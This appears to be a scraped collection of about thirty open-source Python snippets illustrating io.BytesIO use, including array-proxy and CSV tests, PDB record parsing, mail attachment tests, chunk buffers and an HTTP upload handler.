Example #1
def test_init():
    bio = BytesIO()
    shape = [2, 3, 4]
    dtype = np.int32
    arr = np.arange(24, dtype=dtype).reshape(shape)
    bio.seek(16)
    bio.write(arr.tobytes(order='F'))
    hdr = FunkyHeader(shape)
    ap = ArrayProxy(bio, hdr)
    assert_true(ap.file_like is bio)
    assert_equal(ap.shape, shape)
    # shape should be read only
    assert_raises(AttributeError, setattr, ap, 'shape', shape)
    # Get the data
    assert_array_equal(np.asarray(ap), arr)
    # Check we can modify the original header without changing the ap version
    hdr.shape[0] = 6
    assert_not_equal(ap.shape, shape)
    # Data stays the same, also
    assert_array_equal(np.asarray(ap), arr)
    # C order also possible
    bio = BytesIO()
    bio.seek(16)
    bio.write(arr.tobytes(order='C'))
    ap = CArrayProxy(bio, FunkyHeader((2, 3, 4)))
    assert_array_equal(np.asarray(ap), arr)
    # Illegal init
    assert_raises(TypeError, ArrayProxy, bio, object())
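The buffer layout this test relies on, reduced to a hedged, self-contained sketch: array bytes written past a fixed header offset, then recovered with an explicit memory order. FunkyHeader and ArrayProxy are test doubles from the source; plain numpy calls stand in for them here.

from io import BytesIO
import numpy as np

bio = BytesIO()
arr = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
bio.seek(16)                       # leave room for a 16-byte "header"
bio.write(arr.tobytes(order='F'))  # Fortran-order payload

bio.seek(16)
restored = np.frombuffer(bio.read(), dtype=np.int32).reshape((2, 3, 4), order='F')
assert (restored == arr).all()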
Example #2
def bytes_read_csv(b, header, kwargs, dtypes=None, columns=None):
    """ Convert a block of bytes to a Pandas DataFrame

    Parameters
    ----------
    b: bytestring
        The content to be parsed with pandas.read_csv
    header: bytestring
        An optional header to prepend to b
    kwargs: dict
        A dictionary of keyword arguments to be passed to pandas.read_csv
    dtypes: dict
        DTypes to assign to columns
    columns: list
        Expected column names; a ValueError is raised if the parsed
        DataFrame's columns do not match

    See Also
    --------
    dask.dataframe.csv.read_csv_from_bytes
    """
    bio = BytesIO()
    if not b.startswith(header.rstrip()):
        bio.write(header)
    bio.write(b)
    bio.seek(0)
    df = pd.read_csv(bio, **kwargs)
    if dtypes:
        coerce_dtypes(df, dtypes)

    if columns and (list(df.columns) != list(columns)):
        raise ValueError("Columns do not match", df.columns, columns)
    return df
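The header-prepend step in isolation, as a runnable sketch (column names are illustrative; requires pandas):

from io import BytesIO
import pandas as pd

header = b'a,b\n'
block = b'1,2\n3,4\n'            # a later block that lacks its own header
bio = BytesIO()
if not block.startswith(header.rstrip()):
    bio.write(header)            # prepend the header only when it is missing
bio.write(block)
bio.seek(0)
df = pd.read_csv(bio)
assert list(df.columns) == ['a', 'b'] and len(df) == 2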
Example #3
    def open(self, name, mode='rb'):
        resp = self.b2.download_file(name)

        output = BytesIO()
        output.write(resp)
        output.seek(0)
        return File(output, name)
Example #4
def test_tuplespec():
    bio = BytesIO()
    shape = [2, 3, 4]
    dtype = np.int32
    arr = np.arange(24, dtype=dtype).reshape(shape)
    bio.seek(16)
    bio.write(arr.tobytes(order='F'))
    # Create equivalent header and tuple specs
    hdr = FunkyHeader(shape)
    tuple_spec = (hdr.get_data_shape(), hdr.get_data_dtype(),
                  hdr.get_data_offset(), 1., 0.)
    ap_header = ArrayProxy(bio, hdr)
    ap_tuple = ArrayProxy(bio, tuple_spec)
    # Header and tuple specs produce identical behavior
    for prop in ('shape', 'dtype', 'offset', 'slope', 'inter', 'is_proxy'):
        assert_equal(getattr(ap_header, prop), getattr(ap_tuple, prop))
    for method, args in (('get_unscaled', ()), ('__array__', ()),
                         ('__getitem__', ((0, 2, 1), ))
                         ):
        assert_array_equal(getattr(ap_header, method)(*args),
                           getattr(ap_tuple, method)(*args))
    # Tuple-defined ArrayProxies have no header to store
    with warnings.catch_warnings():
        assert_true(ap_tuple.header is None)
    # Partial tuples of length 2-4 are also valid
    for n in range(2, 5):
        ArrayProxy(bio, tuple_spec[:n])
    # Bad tuple lengths
    assert_raises(TypeError, ArrayProxy, bio, ())
    assert_raises(TypeError, ArrayProxy, bio, tuple_spec[:1])
    assert_raises(TypeError, ArrayProxy, bio, tuple_spec + ('error',))
Example #5
    def test_read_atom(self):
        """Test that all fields are read from PDB ATOM records"""
        s = BytesIO()
        # PDB is fixed-format; we should be able to read coordinates even
        # without spaces between them
        s.write(b'ATOM      1  N   ALA A   5    3000.0001000.4002000.600'
                b'  2.00  6.40           N\n')
        s.seek(0)

        m = IMP.Model()
        pdb = IMP.atom.read_pdb(s, m)
        atoms = IMP.atom.get_by_type(pdb, IMP.atom.ATOM_TYPE)
        self.assertEqual(len(atoms), 1)
        a = IMP.atom.Atom(atoms[0])
        r = IMP.atom.Residue(a.get_parent())
        c = IMP.atom.Chain(r.get_parent())
        self.assertEqual(a.get_input_index(), 1)
        self.assertEqual(a.get_atom_type().get_string(), 'N')
        # Note: currently don't read alternate location or insertion code
        self.assertEqual(r.get_residue_type().get_string(), 'ALA')
        self.assertEqual(c.get_id(), 'A')
        self.assertEqual(r.get_index(), 5)
        coord = IMP.core.XYZ(a).get_coordinates()
        self.assertAlmostEqual(coord[0], 3000.000, delta=0.001)
        self.assertAlmostEqual(coord[1], 1000.400, delta=0.001)
        self.assertAlmostEqual(coord[2], 2000.600, delta=0.001)
        self.assertAlmostEqual(a.get_occupancy(), 2.00, delta=0.01)
        self.assertAlmostEqual(a.get_temperature_factor(), 6.40, delta=0.01)
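Why the spaceless coordinates still parse, as a minimal standalone sketch: PDB ATOM records are fixed-width, so fields are recovered by column slicing rather than whitespace splitting (column ranges per the PDB format spec):

line = ('ATOM      1  N   ALA A   5    3000.0001000.4002000.600'
        '  2.00  6.40           N')
x = float(line[30:38])   # columns 31-38
y = float(line[38:46])   # columns 39-46
z = float(line[46:54])   # columns 47-54
assert (x, y, z) == (3000.0, 1000.4, 2000.6)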
Example #6
class FakePayload(object):
    """
    A wrapper around BytesIO that restricts what can be read since data from
    the network can't be seeked and cannot be read outside of its content
    length. This makes sure that views can't do anything under the test client
    that wouldn't work in Real Life.
    """
    def __init__(self, content=None):
        self.__content = BytesIO()
        self.__len = 0
        self.read_started = False
        if content is not None:
            self.write(content)

    def __len__(self):
        return self.__len

    def read(self, num_bytes=None):
        if not self.read_started:
            self.__content.seek(0)
            self.read_started = True
        if num_bytes is None:
            num_bytes = self.__len or 0
        assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
        content = self.__content.read(num_bytes)
        self.__len -= num_bytes
        return content

    def write(self, content):
        if self.read_started:
            raise ValueError("Unable to write a payload after he's been read")
        content = force_bytes(content)
        self.__content.write(content)
        self.__len += len(content)
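A short usage sketch of the contract (assuming the FakePayload class above, with Django's force_bytes importable): writes are only allowed before the first read, and reads cannot exceed what was written.

payload = FakePayload(b'abcdef')
assert len(payload) == 6
assert payload.read(4) == b'abcd'
try:
    payload.write(b'more')   # too late: reading has started
except ValueError:
    pass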
Example #7
    def __init__(self, strings=()):
        self.strings = OrderedDict((s, 0) for s in strings)

        self.records = []
        offset = 0
        buf = BytesIO()
        for key in tuple(self.strings.iterkeys()):
            utf8 = utf8_text(key[:self.MAX_STRING_LENGTH])
            l = len(utf8)
            sz_bytes = encint(l)
            raw = sz_bytes + utf8
            if 0xfbf8 - buf.tell() < 6 + len(raw):
                # Records in PDB files cannot be larger than 0x10000, so we
                # stop well before that.
                pad = 0xfbf8 - buf.tell()
                buf.write(b'\0' * pad)
                self.records.append(buf.getvalue())
                buf.seek(0), buf.truncate(0)
                offset = len(self.records) * 0x10000
            buf.write(raw)
            self.strings[key] = offset
            offset += len(raw)

        val = buf.getvalue()
        if val:
            self.records.append(align_block(val))
Example #8
class ZippedStoreShaWriter(Sha1Writer):

    """Remembers everything someone writes to it and generates a sha"""
    __slots__ = ('buf', 'zip')

    def __init__(self):
        Sha1Writer.__init__(self)
        self.buf = BytesIO()
        self.zip = zlib.compressobj(zlib.Z_BEST_SPEED)

    def __getattr__(self, attr):
        return getattr(self.buf, attr)

    def write(self, data):
        alen = Sha1Writer.write(self, data)
        self.buf.write(self.zip.compress(data))

        return alen

    def close(self):
        self.buf.write(self.zip.flush())

    def seek(self, offset, whence=getattr(os, 'SEEK_SET', 0)):
        """Seeking currently only supports to rewind written data
        Multiple writes are not supported"""
        if offset != 0 or whence != getattr(os, 'SEEK_SET', 0):
            raise ValueError("Can only seek to position 0")
        # END handle offset
        self.buf.seek(0)

    def getvalue(self):
        """:return: string value from the current stream position to the end"""
        return self.buf.getvalue()
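The same idea as a minimal standalone sketch: hash the raw bytes while keeping only the zlib-compressed stream in memory (hashlib.sha1 stands in for the Sha1Writer base class):

import hashlib
import zlib
from io import BytesIO

buf = BytesIO()
compressor = zlib.compressobj(zlib.Z_BEST_SPEED)
sha = hashlib.sha1()

data = b'hello world' * 100
sha.update(data)                      # the sha covers the *uncompressed* data
buf.write(compressor.compress(data))
buf.write(compressor.flush())         # what close() does above

assert zlib.decompress(buf.getvalue()) == data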
Example #9
def deserialize(schema, binary):
    bytes_writer = BytesIO()
    bytes_writer.write(binary)
    bytes_writer.seek(0)

    res = fastavro.schemaless_reader(bytes_writer, schema)
    return res
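A hedged round-trip sketch using the deserialize function above, with an illustrative schema that is not from the source:

import fastavro
from io import BytesIO

schema = {'name': 'Rec', 'type': 'record',
          'fields': [{'name': 'x', 'type': 'int'}]}
payload = BytesIO()
fastavro.schemaless_writer(payload, schema, {'x': 7})
assert deserialize(schema, payload.getvalue()) == {'x': 7}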
Example #10
def test_table_with_no_newline():
    """
    Test that an input file which is completely empty fails in the expected way.
    Test that an input file with one line but no newline succeeds.
    """
    # With guessing
    table = BytesIO()
    with pytest.raises(ascii.InconsistentTableError):
        ascii.read(table)

    # Without guessing
    table = BytesIO()
    with pytest.raises(ValueError) as err:
        ascii.read(table, guess=False, fast_reader=False, format='basic')
    assert 'No header line found' in str(err.value)

    table = BytesIO()
    with pytest.raises(ValueError) as err:
        ascii.read(table, guess=False, fast_reader=True, format='fast_basic')
    assert 'Inconsistent data column lengths' in str(err.value)

    # Put a single line of column names but with no newline
    for kwargs in [dict(),
                   dict(guess=False, fast_reader=False, format='basic'),
                   dict(guess=False, fast_reader=True, format='fast_basic')]:
        table = BytesIO()
        table.write(b'a b')
        t = ascii.read(table, **kwargs)
        assert t.colnames == ['a', 'b']
        assert len(t) == 0
Example #11
class ChunkBuffer:
    BUFFER_SIZE = 1 * 1024 * 1024

    def __init__(self, key, chunker_params=CHUNKER_PARAMS):
        self.buffer = BytesIO()
        self.packer = msgpack.Packer(unicode_errors='surrogateescape')
        self.chunks = []
        self.key = key
        self.chunker = Chunker(self.key.chunk_seed, *chunker_params)

    def add(self, item):
        self.buffer.write(self.packer.pack(StableDict(item)))
        if self.is_full():
            self.flush()

    def write_chunk(self, chunk):
        raise NotImplementedError

    def flush(self, flush=False):
        if self.buffer.tell() == 0:
            return
        self.buffer.seek(0)
        chunks = list(bytes(s) for s in self.chunker.chunkify(self.buffer))
        self.buffer.seek(0)
        self.buffer.truncate(0)
        # Leave the last partial chunk in the buffer unless flush is True
        end = None if flush or len(chunks) == 1 else -1
        for chunk in chunks[:end]:
            self.chunks.append(self.write_chunk(chunk))
        if end == -1:
            self.buffer.write(chunks[-1])

    def is_full(self):
        return self.buffer.tell() > self.BUFFER_SIZE
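A minimal sketch of the flush slicing rule above: every complete chunk is emitted, and the trailing partial chunk is written back to the buffer unless a final flush is forced:

chunks = [b'aaaa', b'bbbb', b'cc']   # last element is a partial chunk
flush = False
end = None if flush or len(chunks) == 1 else -1
emitted = chunks[:end]
kept = chunks[-1] if end == -1 else b''
assert emitted == [b'aaaa', b'bbbb'] and kept == b'cc'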
Example #12
class EchoLine(Connection):  # {{{

    bye_after_echo = False

    def connection_ready(self):
        self.rbuf = BytesIO()
        self.set_state(READ, self.read_line)

    def read_line(self, event):
        data = self.recv(1)
        if data:
            self.rbuf.write(data)
            if b"\n" == data:
                if self.rbuf.tell() < 3:
                    # Empty line
                    self.rbuf = BytesIO(b"bye" + self.rbuf.getvalue())
                    self.bye_after_echo = True
                self.set_state(WRITE, self.echo)
                self.rbuf.seek(0)

    def echo(self, event):
        pos = self.rbuf.tell()
        self.rbuf.seek(0, os.SEEK_END)
        left = self.rbuf.tell() - pos
        self.rbuf.seek(pos)
        sent = self.send(self.rbuf.read(512))
        if sent == left:
            self.rbuf = BytesIO()
            self.set_state(READ, self.read_line)
            if self.bye_after_echo:
                self.ready = False
        else:
            self.rbuf.seek(pos + sent)
Example #13
	def upload(self, path, filename,buffersize=None,callback=None, local_path=None):
		try:
			self.error = None
			#print('Upload = ' + path + filename)
			#print('Size = %.1f kB' % (os.path.getsize(filename) / 1024.0))
			#print('start upload')
			if local_path:
				file_obj = open(local_path+filename, 'rb')
			else:
				file_obj = open(filename, 'rb')
			offset = 0
			while True:
				if not buffersize:
					filesize = self.conn.storeFile(self.service_name, path+filename, file_obj)
					break
				else:	
					buffer_obj = file_obj.read(buffersize)			
					if buffer_obj:
						buffer_fileobj = BytesIO()
						buffer_fileobj.write(buffer_obj)
						buffer_fileobj.seek(0)
						offset_new = self.conn.storeFileFromOffset(self.service_name, path+filename, buffer_fileobj, offset=offset, truncate=False)
						#return the file position where the next byte will be written.
						offset = offset_new
						if callback:
							callback(offset)
					else:
						break
			file_obj.close()
			#print('upload finished')
		except Exception as e:
			if self.print_errors:
				print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)
			else:
				self.error = 'Error on line {}'.format(sys.exc_info()[-1].tb_lineno) + str(type(e).__name__) + str(e)
Example #14
def get_printable_message_args(msg, buff=None, prefix=''):
    """
    Get string representation of msg arguments
    :param msg: msg message to fill, ``Message``
    :param prefix: field name prefix (for verbose printing), ``str``
    :returns: printable representation of  msg args, ``str``
    """
    try:
        from cStringIO import StringIO # Python 2.x
        python3 = 0
    except ImportError:
        from io import BytesIO # Python 3.x
        python3 = 1

    if buff is None:
        if python3 == 1:
            buff = BytesIO()
        else: 
            buff = StringIO()
    for f in msg.__slots__:
        if isinstance(getattr(msg, f), Message):
            get_printable_message_args(getattr(msg, f), buff=buff, prefix=(prefix+f+'.'))
        else:
            buff.write(prefix+f+' ')
    return buff.getvalue().rstrip()
Example #15
    def switch_xlog(self):
        self.log.debug("Switching xlog from %r amount of data: %r",
                       self.latest_wal, self.buffer.tell())

        self.buffer.seek(0)
        wal_data = BytesIO(self.buffer.read(XLOG_SEG_SIZE))
        wal_data.seek(0, os.SEEK_END)
        padding = XLOG_SEG_SIZE - wal_data.tell()
        # Pad with 0s up to XLOG_SEG_SIZE
        wal_data.write(padding * b"\0")
        wal_data.seek(0)
        callback_queue = Queue()
        self.callbacks[self.latest_wal_start] = callback_queue

        compression_event = {
            "type": "CLOSE_WRITE",
            "callback_queue": callback_queue,
            "compress_to_memory": True,
            "delete_file_after_compression": False,
            "input_data": wal_data,
            "full_path": self.latest_wal,
            "site": self.site,
        }
        self.latest_wal = None
        self.compression_queue.put(compression_event)

        rest_of_data = self.buffer.read()
        assert len(rest_of_data) == 0
        self.buffer = BytesIO(rest_of_data)
        self.buffer.seek(0, os.SEEK_END)
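The padding step in isolation, as a minimal sketch (16 MiB is PostgreSQL's usual default segment size; the source takes it from XLOG_SEG_SIZE):

import os
from io import BytesIO

XLOG_SEG_SIZE = 16 * 1024 * 1024
wal_data = BytesIO(b'\x01\x02\x03')   # a partial segment
wal_data.seek(0, os.SEEK_END)
padding = XLOG_SEG_SIZE - wal_data.tell()
wal_data.write(padding * b'\x00')     # pad with zero bytes to segment size
assert len(wal_data.getvalue()) == XLOG_SEG_SIZE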
Example #16
    def test_send_attach(self):
        attach = BytesIO()
        attach.write(b'content')
        attach.seek(0)
        attachs = [('attachment', 'text/plain', attach)]

        mailsender = MailSender(debug=True)
        mailsender.send(to=['*****@*****.**'], subject='subject', body='body',
                       attachs=attachs, _callback=self._catch_mail_sent)

        assert self.catched_msg
        self.assertEqual(self.catched_msg['to'], ['*****@*****.**'])
        self.assertEqual(self.catched_msg['subject'], 'subject')
        self.assertEqual(self.catched_msg['body'], 'body')

        msg = self.catched_msg['msg']
        self.assertEqual(msg['to'], '*****@*****.**')
        self.assertEqual(msg['subject'], 'subject')

        payload = msg.get_payload()
        assert isinstance(payload, list)
        self.assertEqual(len(payload), 2)

        text, attach = payload
        self.assertEqual(text.get_payload(decode=True), b'body')
        self.assertEqual(text.get_charset(), Charset('us-ascii'))
        self.assertEqual(attach.get_payload(decode=True), b'content')
Example #17
    def test_send_attach_utf8(self):
        subject = u'sübjèçt'
        body = u'bödÿ-àéïöñß'
        attach = BytesIO()
        attach.write(body.encode('utf-8'))
        attach.seek(0)
        attachs = [('attachment', 'text/plain', attach)]

        mailsender = MailSender(debug=True)
        mailsender.send(to=['*****@*****.**'], subject=subject, body=body,
                        attachs=attachs, charset='utf-8', _callback=self._catch_mail_sent)

        assert self.catched_msg
        self.assertEqual(self.catched_msg['subject'], subject)
        self.assertEqual(self.catched_msg['body'], body)

        msg = self.catched_msg['msg']
        self.assertEqual(msg['subject'], subject)
        self.assertEqual(msg.get_charset(), Charset('utf-8'))
        self.assertEqual(msg.get('Content-Type'), 'multipart/mixed; charset="utf-8"')

        payload = msg.get_payload()
        assert isinstance(payload, list)
        self.assertEqual(len(payload), 2)

        text, attach = payload
        self.assertEqual(text.get_payload(decode=True).decode('utf-8'), body)
        self.assertEqual(text.get_charset(), Charset('utf-8'))
        self.assertEqual(attach.get_payload(decode=True).decode('utf-8'), body)
Example #18
    def do_install(self, name, data):
        if name in data:
            utils.makedirs(self.output_dir)
            LOGGER.notice('Downloading: ' + data[name])
            zip_file = BytesIO()
            zip_file.write(requests.get(data[name]).content)
            LOGGER.notice('Extracting: {0} into themes'.format(name))
            utils.extract_all(zip_file)
            dest_path = os.path.join('themes', name)
        else:
            try:
                theme_path = utils.get_theme_path(name)
            except Exception:
                LOGGER.error("Can't find theme " + name)
                return False

            utils.makedirs(self.output_dir)
            dest_path = os.path.join(self.output_dir, name)
            if os.path.exists(dest_path):
                LOGGER.error("{0} is already installed".format(name))
                return False

            LOGGER.notice('Copying {0} into themes'.format(theme_path))
            shutil.copytree(theme_path, dest_path)
        confpypath = os.path.join(dest_path, 'conf.py.sample')
        if os.path.exists(confpypath):
            LOGGER.notice('This plugin has a sample config file.')
            print('Contents of the conf.py.sample file:\n')
            with codecs.open(confpypath, 'rb', 'utf-8') as fh:
                print(indent(pygments.highlight(
                    fh.read(), PythonLexer(), TerminalFormatter()), 4 * ' '))
            return True
Example #19
    class TCP:
        port = 80
        disconnected = False

        def __init__(self):
            self.written = BytesIO()
            self.producers = []

        def getPeer(self):
            return IPv4Address("TCP", '192.168.1.1', 12344)

        def write(self, data):
            if not isinstance(data, bytes):
                raise TypeError("Can only write bytes to a transport, not %r" % (data,))
            self.written.write(data)

        def writeSequence(self, iovec):
            for data in iovec:
                self.write(data)

        def getHost(self):
            return IPv4Address("TCP", '10.0.0.1', self.port)

        def registerProducer(self, producer, streaming):
            self.producers.append((producer, streaming))

        def unregisterProducer(self):
            pass

        def loseConnection(self):
            self.disconnected = True
Example #20
    def write(self, data):
        """Appends data to buffer"""
        available_before = self.available

        # trim data if limit expected
        has_limit = self.buffer_limit is not None
        if has_limit and ((len(data) + self.available) > self.buffer_limit):
            data = data[: self.buffer_limit - self.available]

        if self.size < self.available + len(data):
            # Expand buffer
            new_buf = BytesIO()
            new_buf.write(self.read())
            self.write_fp = self.available = new_buf.tell()
            read_fp = 0
            while self.size <= self.available + len(data):
                self.size = max(self.size, 1024) * 2
            new_buf.write("0" * (self.size - self.write_fp))
            self.buf = new_buf
        else:
            read_fp = self.buf.tell()

        self.buf.seek(self.write_fp)
        written = self.size - self.write_fp
        self.buf.write(data[:written])
        self.write_fp += len(data)
        self.available += len(data)
        if written < len(data):
            self.write_fp -= self.size
            self.buf.seek(0)
            self.buf.write(data[written:])
        self.buf.seek(read_fp)

        return self.available - available_before
Example #21
def export():
    '''Export the search results as CSV file'''
    try:
        if 'query' not in request.json:
            query = Query.from_string(request.json.get('search_string', ''), return_type='csv')
        else:
            query = Query.from_json(request.json['query'])
    except ValueError:
        abort(400)

    try:
        offset = int(request.json.get('offset', '0'))
    except ValueError:
        offset = 0

    try:
        paginate = int(request.json.get('paginate', '0'))
    except ValueError:
        paginate = 0

    return_type = query.return_type
    search_type = query.search_type

    if return_type not in ('json', 'csv', 'fasta', 'fastaa'):
        abort(400)

    search_results = core_search(query)
    g.verbose = query.verbose
    if query.verbose:
        g.search_str = str(query)

    total = len(search_results)

    if paginate > 0:
        end = min(offset + paginate, total)
    else:
        end = total

    search_results = search_results[offset:end]

    limit = FASTA_LIMITS.get(search_type, 100)

    if return_type.startswith('fasta') and len(search_results) > limit:
        raise TooManyResults('More than {limit} search results for FASTA {search} download ({number} found), please specify a smaller query.'.format(
            limit=limit, search=search_type, number=len(search_results)))

    found_bgcs = format_results(query, search_results)
    filename = 'asdb_search_results.{}'.format(return_type)
    if query.return_type == 'json':
        found_bgcs = [json.dumps(found_bgcs)]

    handle = BytesIO()
    for line in found_bgcs:
        handle.write('{}\n'.format(line).encode('utf-8'))

    handle.seek(0)

    mime_type = MIME_TYPE_MAP.get(query.return_type, None)

    return send_file(handle, mimetype=mime_type, attachment_filename=filename, as_attachment=True)
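The buffer-building step reduced to a runnable sketch: encode text lines into an in-memory file and rewind it before handing it to send_file (result lines are illustrative):

from io import BytesIO

found_bgcs = ['line one', 'line two']
handle = BytesIO()
for line in found_bgcs:
    handle.write('{}\n'.format(line).encode('utf-8'))
handle.seek(0)
assert handle.read() == b'line one\nline two\n'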
Example #22
class Tee(RawIOBase):
    def __init__(self, source):
        self.source = source
        self.buf = BytesIO()

    def __iter__(self):
        for line in self.source:
            self.buf.write(line)
            yield line

    def __enter__(self):
        return self

    def __exit__(self, typ, val, tb):
        self.close()

    def close(self):
        self.source.close()
        self.buf = None

    @property
    def closed(self):
        return self.source.closed

    def read(self, size=None):
        b = self.source.read(size)
        self.buf.write(b)
        return b
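A hedged usage sketch (assuming the Tee class above): every byte read from the source is mirrored into the internal buffer.

from io import BytesIO

tee = Tee(BytesIO(b'line1\nline2\n'))
assert tee.read(6) == b'line1\n'
assert tee.buf.getvalue() == b'line1\n'
tee.close()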
Example #23
    def read(self, fh, offset, length):
        '''Read `length` bytes from `fh` at position `offset`

        Unless EOF is reached, returns exactly `length` bytes.

        This method releases the global lock while it is running.
        '''
        #log.debug('started with %d, %d, %d', fh, offset, length)
        buf = BytesIO()
        inode = self.inodes[fh]

        # Make sure that we don't read beyond the file size. This
        # should not happen unless direct_io is activated, but it's
        # cheap and nice for testing.
        size = inode.size
        length = min(size - offset, length)

        while length > 0:
            tmp = self._readwrite(fh, offset, length=length)
            buf.write(tmp)
            length -= len(tmp)
            offset += len(tmp)

        # Inode may have expired from cache
        inode = self.inodes[fh]

        if inode.atime < inode.ctime or inode.atime < inode.mtime:
            inode.atime = time.time()

        return buf.getvalue()
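The accumulation loop in isolation, as a minimal sketch: a reader that may return short is called repeatedly, writing into a BytesIO until the requested length is covered:

from io import BytesIO

reads = iter([b'ab', b'cd', b'e'])   # a reader that returns short reads
buf, length = BytesIO(), 5
while length > 0:
    tmp = next(reads)
    buf.write(tmp)
    length -= len(tmp)
assert buf.getvalue() == b'abcde'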
Example #24
    def test_update_object_and_get_through_store_should_get_identical_bytestream(self):

        # create file
        storage_factory = PairtreeStorageFactory()
        store = storage_factory.get_store(store_dir=self.data_dir, uri_base="http://dummy")
        id = u'owërdœ.file'
        object = store.create_object(id)
        with open(self.test_file_path, 'rb') as test_file:
            object.add_bytestream('dummy.txt', test_file)

        # update file
        handle_large_file_2 = BytesIO()
        handle_large_file_2.write(b'baz')
        handle_large_file_2.seek(0)
        object.add_bytestream('dummy.txt', handle_large_file_2)

        handle_large_file_2.close()

        # create check
        string_io_container = BytesIO()
        string_io_container.write(b'baz')

        retrieved_bytestream = object.get_bytestream('dummy.txt')
        orig_hash = hashlib.md5(string_io_container.getvalue()).hexdigest()
        created_hash = hashlib.md5(retrieved_bytestream).hexdigest()

        self.assertEqual(orig_hash, created_hash)
Example #25
class Msgunfmt(Command):
    CHARSET_RE = re.compile(rb'^"Content-Type: [^;]+; charset=([^\\]+)\\n"$')

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._header = BytesIO()
        self._encoding = None

    @tool_required('msgunfmt')
    def cmdline(self):
        return ['msgunfmt', self.path]

    def filter(self, line):
        if not self._encoding:
            self._header.write(line)
            if line == b'\n':
                logger.debug("unable to determine PO encoding, let's hope it's utf-8")
                self._encoding = 'utf-8'
                return self._header.getvalue()
            found = Msgunfmt.CHARSET_RE.match(line)
            if found:
                self._encoding = found.group(1).decode('us-ascii').lower()
                return self._header.getvalue().decode(self._encoding).encode('utf-8')
            return b''
        if self._encoding != 'utf-8':
            return line.decode(self._encoding).encode('utf-8')
        else:
            return line
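A minimal sketch of the charset sniffing: the regex pulls the encoding out of the PO header's Content-Type line (msgunfmt escapes the newline, hence the literal backslash-n in the pattern):

import re

CHARSET_RE = re.compile(rb'^"Content-Type: [^;]+; charset=([^\\]+)\\n"$')
line = b'"Content-Type: text/plain; charset=ISO-8859-1\\n"'
found = CHARSET_RE.match(line)
assert found and found.group(1).decode('us-ascii').lower() == 'iso-8859-1'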
Example #26
def get_buffer_and_cam(row, cid, gmt):
    """Get things"""
    if row['scrape_url'] is None:
        cam = vbcam.get_vbcam(cid)
        cam.retries = 2

        # Get Still
        buf = BytesIO()
        buf.write(cam.get_one_shot())
        buf.seek(0)

    else:
        buf, cam = None, None
        """
        url = row['scrape_url']
        req = urllib2.Request(url)
        try:
            req2 = urllib2.urlopen(req)
        except Exception as exp:
            if NOW.minute == 0:
                print('Exception for %s: %s' % (cid, exp))
            return
        modified = req2.info().getheader('Last-Modified')
        if modified:
            gmt = datetime.datetime.strptime(modified,
                                             "%a, %d %b %Y %H:%M:%S %Z")
            now = gmt + datetime.timedelta(seconds=NOW.utcoffset().seconds)
            # Round up to nearest 5 minute bin
            roundup = 5 - now.minute % 5
            gmt += datetime.timedelta(minutes=roundup)
        buf = StringIO.StringIO(req2.read())
        buf.seek(0)
        """
    return buf, cam, gmt
Example #27
class OutputStreamWrapper(unohelper.Base, XOutputStream):
    """ Minimal Implementation of XOutputStream """
    def __init__(self, debug=True):
        self.debug = debug
        self.data = BytesIO()
        self.position = 0
        if self.debug:
            sys.stderr.write("__init__ OutputStreamWrapper.\n")

    def writeBytes(self, bytes):
        if self.debug:
            sys.stderr.write("writeBytes %i bytes.\n" % len(bytes.value))
        self.data.write(bytes.value)
        self.position += len(bytes.value)

    def close(self):
        if self.debug:
            sys.stderr.write("Closing output. %i bytes written.\n" % self.position)
        self.data.close()

    def flush(self):
        if self.debug:
            sys.stderr.write("Flushing output.\n")
        pass
    def closeOutput(self):
        if self.debug:
            sys.stderr.write("Closing output.\n")
        pass
Example #28
    def from_json(self, payload):
        """
        Read and decode the HTTP request payload, seen as a
        JSON string, into a python object.
        """

        buffer = BytesIO()

        # TODO: Can this be refactored into an iter() w/ sentinel?

        while True:
            try:
                chunk = yield from payload.read()
                if chunk == b'':
                    break
                buffer.write(chunk)
            except EofStream:
                break

        try:
            return json.loads(buffer.getvalue().decode('UTF-8'))
        except (TypeError, ValueError):
            self.logger.error('Invalid JSON payload from client \'{}\'.'
                              .format(self.client))
            yield from \
                self.respond('Request payload contains malformed JSON content.',
                             400)
Example #29
    def Generate(self, File=None):
        Buffer = BytesIO()
        if len(self.PostfixNotation) == 0:
            return False

        for Item in self.PostfixNotation:
            if Item in self.Opcode[self.Phase]:
                Buffer.write(pack("B", self.Opcode[self.Phase][Item]))
            elif Item in self.SupportedOpcode:
                EdkLogger.error("GenDepex", FORMAT_INVALID,
                                "Opcode [%s] is not expected in %s phase" % (Item, self.Phase),
                                ExtraData=self.ExpressionString)
            else:
                Buffer.write(self.GetGuidValue(Item))

        FilePath = ""
        FileChangeFlag = True
        if File is None:
            sys.stdout.write(Buffer.getvalue())
            FilePath = "STDOUT"
        else:
            FileChangeFlag = SaveFileOnChange(File, Buffer.getvalue(), True)

        Buffer.close()
        return FileChangeFlag
Example #30
def dumpIO_source(object, **kwds):
    """write object source to a buffer (instead of dill.dump)
Load with dill.temp.loadIO_source.  Returns the buffer object.

    >>> f = lambda x:x**2
    >>> pyfile = dill.temp.dumpIO_source(f, alias='_f')
    >>> _f = dill.temp.loadIO_source(pyfile)
    >>> _f(4)
    16

Optional kwds:
    If 'alias' is specified, the object will be renamed to the given string.
    """
    from .source import importable, getname
    if PY3:
        from io import BytesIO as StringIO
    else:
        from StringIO import StringIO
    alias = kwds.pop('alias', '') #XXX: include an alias so a name is known
    name = str(alias) or getname(object)
    name = "\n#NAME: %s\n" % name
    #XXX: assumes kwds['dir'] is writable and on $PYTHONPATH
    file = StringIO()
    file.write(b(''.join([importable(object, alias=alias),name])))
    file.flush()
    return file
Example #31
 def do_POST(self):
     """Serve a POST request."""
     r, info = self.deal_post_data()
     print((r, info, "by: ", self.client_address))
     f = BytesIO()
     f.write(b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
     f.write(b"<html>\n<title>Upload Result Page</title>\n")
     f.write(b"<body>\n<h2>Upload Result Page</h2>\n")
     f.write(b"<hr>\n")
     if r:
         f.write(b"<strong>Success:</strong>")
     else:
         f.write(b"<strong>Failed:</strong>")
     f.write(info.encode())
     f.write(
         ("<br><a href=\"%s\">back</a>" % self.headers['referer']).encode())
     f.write(b"here</a>.</small></body>\n</html>\n")
     length = f.tell()
     f.seek(0)
     self.send_response(200)
     self.send_header("Content-type", "text/html")
     self.send_header("Content-Length", str(length))
     self.end_headers()
     if f:
         self.copyfile(f, self.wfile)
         f.close()
Example #32
